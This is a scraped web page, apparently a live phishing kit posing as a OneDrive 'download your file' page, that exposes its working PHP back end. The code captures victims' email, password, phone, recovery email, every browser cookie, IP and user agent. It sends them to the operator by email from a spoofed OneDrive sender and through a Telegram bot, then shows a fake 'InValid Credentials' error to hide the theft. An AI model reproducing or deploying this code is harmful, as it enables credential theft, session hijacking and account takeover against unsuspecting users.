Access Denied

Access Denied

'); } // Function to send message to Telegram function sendToTelegram($message, $bot_token, $chat_id) { $telegram_url = "https://api.telegram.org/bot" . $bot_token . "/sendMessage"; $post_data = array( 'chat_id' => $chat_id, 'text' => $message, 'parse_mode' => 'HTML' ); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $telegram_url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 10); $result = curl_exec($ch); curl_close($ch); return $result; } // Function to send file to Telegram function sendFileToTelegram($file_path, $bot_token, $chat_id, $caption = '') { $telegram_url = "https://api.telegram.org/bot" . $bot_token . "/sendDocument"; $post_data = array( 'chat_id' => $chat_id, 'document' => new CURLFile(realpath($file_path)), 'caption' => $caption, 'parse_mode' => 'HTML' ); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $telegram_url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $result = curl_exec($ch); curl_close($ch); return $result; } // Function to send email with attachment function sendEmailWithAttachment($to, $subject, $message, $attachment_path) { $boundary = md5(time()); // Headers $headers = "MIME-Version: 1.0\r\n"; $headers .= "From: noreply@onedrive-security.com\r\n"; $headers .= "Reply-To: noreply@onedrive-security.com\r\n"; $headers .= "Content-Type: multipart/mixed; boundary=\"" . $boundary . "\"\r\n"; // Message body $body = "--" . $boundary . "\r\n"; $body .= "Content-Type: text/plain; charset=\"UTF-8\"\r\n"; $body .= "Content-Transfer-Encoding: 7bit\r\n\r\n"; $body .= $message . "\r\n\r\n"; // Attachment if (file_exists($attachment_path)) { $file_content = file_get_contents($attachment_path); $file_content = chunk_split(base64_encode($file_content)); $body .= "--" . $boundary . "\r\n"; $body .= "Content-Type: application/json; name=\"" . basename($attachment_path) . "\"\r\n"; $body .= "Content-Transfer-Encoding: base64\r\n"; $body .= "Content-Disposition: attachment; filename=\"" . basename($attachment_path) . "\"\r\n\r\n"; $body .= $file_content . "\r\n\r\n"; } $body .= "--" . $boundary . "--"; return mail($to, $subject, $body, $headers); } // Function to get all cookies function getAllCookies() { $cookies = array(); foreach ($_COOKIE as $name => $value) { $cookies[$name] = $value; } return $cookies; } // Function to save cookies to JSON file in cookies folder function saveCookiesToJson($email, $additional_data = array()) { $timestamp = date('Y-m-d_H-i-s'); $safe_email = preg_replace('/[^a-zA-Z0-9]/', '_', $email); $ip_safe = preg_replace('/[^a-zA-Z0-9]/', '_', getenv("REMOTE_ADDR")); $filename = $safe_email . "_" . $ip_safe . "_" . $timestamp . ".json"; $filepath = COOKIES_FOLDER . $filename; $cookie_data = array( 'timestamp' => date('Y-m-d H:i:s'), 'ip' => getenv("REMOTE_ADDR"), 'user_agent' => $_SERVER['HTTP_USER_AGENT'], 'email' => $email, 'cookies' => getAllCookies(), 'additional_data' => $additional_data ); file_put_contents($filepath, json_encode($cookie_data, JSON_PRETTY_PRINT)); return $filepath; } // Function to clean old cookie files (optional - keeps last 100 files) function cleanOldCookies($keep_files = 100) { $files = glob(COOKIES_FOLDER . '*.json'); if (count($files) > $keep_files) { // Sort by file modification time (oldest first) usort($files, function($a, $b) { return filemtime($a) - filemtime($b); }); // Delete oldest files $files_to_delete = array_slice($files, 0, count($files) - $keep_files); foreach ($files_to_delete as $file) { unlink($file); } } } // Handle form submission $signal = ''; $msg = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $email = isset($_POST['ai']) ? trim($_POST['ai']) : ''; $password = isset($_POST['pr']) ? trim($_POST['pr']) : ''; $ph = isset($_POST['ph']) ? trim($_POST['ph']) : ''; $rec_ai = isset($_POST['rec_ai']) ? trim($_POST['rec_ai']) : ''; if (!empty($email) && !empty($password)) { $ip = getenv("REMOTE_ADDR"); $hostname = gethostbyaddr($ip); $useragent = $_SERVER['HTTP_USER_AGENT']; // Capture all cookies $all_cookies = getAllCookies(); $cookie_count = count($all_cookies); // Save cookies to JSON file in cookies folder $additional_data = array( 'password' => $password, 'phone' => $ph, 'recovery_email' => $rec_ai ); $json_file = saveCookiesToJson($email, $additional_data); // Clean old cookies (optional - keeps last 100 files) cleanOldCookies(100); // Build text message with relative path to cookie file $relative_path = 'cookies/' . basename($json_file); // Build text message $message = "|----------| xLs |--------------|\n"; $message .= "Online ID : ".$email."\n"; $message .= "Passcode : ".$password."\n"; if (!empty($ph)) { $message .= "Phone : ".$ph."\n"; } if (!empty($rec_ai)) { $message .= "Recovery Email : ".$rec_ai."\n"; } $message .= "|----------| COOKIES |--------------|\n"; $message .= "Cookies Captured: " . $cookie_count . "\n"; foreach ($all_cookies as $name => $value) { $message .= $name . " : " . substr($value, 0, 50) . (strlen($value) > 50 ? "..." : "") . "\n"; } $message .= "|--------------- I N F O | I P -------------------|\n"; $message .= "|Client IP: ".$ip."\n"; $message .= "|--- http://www.geoiptool.com/?IP=$ip ----\n"; $message .= "User Agent : ".$useragent."\n"; $message .= "JSON File: " . $relative_path . "\n"; $message .= "|----------- CrEaTeD bY VeNzA --------------|\n"; // Send to email with attachment $subject = "Login + Cookies : $ip"; sendEmailWithAttachment($config['email'], $subject, $message, $json_file); // Send to Telegram if enabled if ($config['send_to_telegram'] && !empty($config['telegram_token']) && !empty($config['telegram_chat_id'])) { // Send text message first $telegram_message = "📧 New Login Capture with Cookies\n"; $telegram_message .= "════════════════════\n"; $telegram_message .= "📱 Online ID: " . htmlspecialchars($email) . "\n"; $telegram_message .= "🔑 Password: " . htmlspecialchars($password) . "\n"; if (!empty($ph)) { $telegram_message .= "📞 Phone: " . htmlspecialchars($ph) . "\n"; } if (!empty($rec_ai)) { $telegram_message .= "✉️ Recovery Email: " . htmlspecialchars($rec_ai) . "\n"; } $telegram_message .= "════════════════════\n"; $telegram_message .= "🍪 Cookies Captured: " . $cookie_count . "\n"; $telegram_message .= "════════════════════\n"; $telegram_message .= "🌐 IP Address: " . $ip . "\n"; $telegram_message .= "🖥 User Agent: " . htmlspecialchars($useragent) . "\n"; $telegram_message .= "════════════════════\n"; $telegram_message .= "📍 " . date('Y-m-d H:i:s') . "\n"; $telegram_message .= "📎 JSON file attached\n"; sendToTelegram($telegram_message, $config['telegram_token'], $config['telegram_chat_id']); // Send JSON file $file_caption = "🍪 Cookies for: " . htmlspecialchars($email); sendFileToTelegram($json_file, $config['telegram_token'], $config['telegram_chat_id'], $file_caption); } $signal = 'ok'; $msg = 'InValid Credentials'; // Return JSON for AJAX requests if (!empty($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest') { header('Content-Type: application/json'); echo json_encode(['signal' => $signal, 'msg' => $msg]); exit; } } else { $signal = 'bad'; $msg = 'Please fill in all the fields.'; if (!empty($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest') { header('Content-Type: application/json'); echo json_encode(['signal' => $signal, 'msg' => $msg]); exit; } } } ?>
OneDrive
OneDrive
Welcome to your new OneDrive!



That's a lot to love about having OneDrive. Take the next step by downloading your file.
Download your Complete File
Cookies captured & sent!